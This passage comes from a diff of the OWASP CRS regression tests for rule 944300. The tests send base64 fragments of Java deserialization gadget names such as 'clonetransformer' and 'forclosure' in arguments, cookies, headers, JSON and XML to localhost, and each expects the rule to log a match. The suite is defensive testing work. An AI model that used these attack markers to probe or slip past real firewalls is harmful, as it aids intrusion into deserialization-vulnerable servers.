"application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BjbG9uZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_id: 97 desc: "Content-Type text/plain includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BjbG9uZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-98 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BjbG9uZXRyYW5zZm9ybWVy" + output: + log_contains: "id \"944300\"" + - test_id: 98 desc: "Content-Type application/json arg value includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"BjbG9uZXRyYW5zZm9ybWVy\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-99 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"BjbG9uZXRyYW5zZm9ybWVy\"}" + output: + log_contains: "id \"944300\"" + - test_id: 99 desc: "Content-Type application/json arg name includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"BjbG9uZXRyYW5zZm9ybWVy\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-100 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"BjbG9uZXRyYW5zZm9ybWVy\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 100 desc: "Argument test includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Zm9yY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-101 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Zm9yY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_id: 101 desc: "Argument name includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Zm9yY2xvc3VyZQ=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-102 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Zm9yY2xvc3VyZQ=test" + output: + log_contains: "id \"944300\"" + - test_id: 102 desc: "Cookie test includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Zm9yY2xvc3VyZQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-103 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Zm9yY2xvc3VyZQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 103 desc: "Cookie name includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Zm9yY2xvc3VyZQ=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-104 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Zm9yY2xvc3VyZQ=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 104 desc: "Request header test includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Zm9yY2xvc3VyZQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-105 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Zm9yY2xvc3VyZQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 105 desc: "XML attribute value includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-106 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 106 desc: "XML element value includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Zm9yY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-107 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Zm9yY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_id: 107 desc: "Nested XML element value includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Zm9yY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-108 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Zm9yY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_id: 108 desc: "Content-Type text/plain includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Zm9yY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-109 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Zm9yY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_id: 109 desc: "Content-Type application/json arg value includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Zm9yY2xvc3VyZQ\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-110 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Zm9yY2xvc3VyZQ\"}" + output: + log_contains: "id \"944300\"" + - test_id: 110 desc: "Content-Type application/json arg name includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Zm9yY2xvc3VyZQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-111 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Zm9yY2xvc3VyZQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 111 desc: "Argument test includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=GZvcmNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-112 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=GZvcmNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_id: 112 desc: "Argument name includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "GZvcmNsb3N1cmU=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-113 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "GZvcmNsb3N1cmU=test" + output: + log_contains: "id \"944300\"" + - test_id: 113 desc: "Cookie test includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=GZvcmNsb3N1cmU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-114 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=GZvcmNsb3N1cmU + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 114 desc: "Cookie name includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: GZvcmNsb3N1cmU=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-115 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: GZvcmNsb3N1cmU=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 115 desc: "Request header test includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: GZvcmNsb3N1cmU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-116 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: GZvcmNsb3N1cmU + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 116 desc: "XML attribute value includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-117 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 117 desc: "XML element value includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "GZvcmNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-118 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "GZvcmNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_id: 118 desc: "Nested XML element value includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "GZvcmNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-119 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "GZvcmNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_id: 119 desc: "Content-Type text/plain includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=GZvcmNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-120 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=GZvcmNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_id: 120 desc: "Content-Type application/json arg value includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"GZvcmNsb3N1cmU\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-121 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"GZvcmNsb3N1cmU\"}" + output: + log_contains: "id \"944300\"" + - test_id: 121 desc: "Content-Type application/json arg name includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"GZvcmNsb3N1cmU\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-122 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"GZvcmNsb3N1cmU\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 122 desc: "Argument test includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Bmb3JjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-123 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Bmb3JjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_id: 123 desc: "Argument name includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bmb3JjbG9zdXJl=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-124 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: 